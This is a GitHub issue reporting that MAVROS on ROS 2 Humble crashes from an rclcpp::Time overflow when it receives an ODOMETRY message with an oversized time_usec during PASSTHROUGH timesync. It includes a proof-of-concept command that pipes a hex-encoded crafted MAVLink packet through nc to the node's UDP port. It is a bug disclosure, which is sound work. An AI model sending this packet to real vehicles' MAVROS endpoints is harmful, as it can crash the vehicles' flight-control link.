Skip to content

rclcpp::Time crash due to invalid time_usec during TSYNC #2083

@Fuzz0X

Description

@Fuzz0X

Describe the bug

When timesync_mode in px4_config.yaml is set to PASSTHROUGH, sending an ODOMETRY (331)message with a time_usec greater than 2,147,483,647,000,000 to MAVROS directly triggers a timestamp overflow.

Image

The MAVROS node crashes with the following error:

Image

GDB log

It is in the attachment below

gdb.txt

How to reproduce

1.start mavros

ros2 run mavros mavros_node --ros-args -p fcu_url:=udp://:14540@127.0.0.1:14557

2.Poc command

echo "fde900000001014b0100008053ee7ba80a000000000000000000000000000000803f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010c0000640c71" | xxd -r -p | nc -u -w1 127.0.0.1 14540

System Information

ROS 2 Distribution: Humble
MAVROS version: ros2 branch
OS: Ubuntu 22.04

trigger position

Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions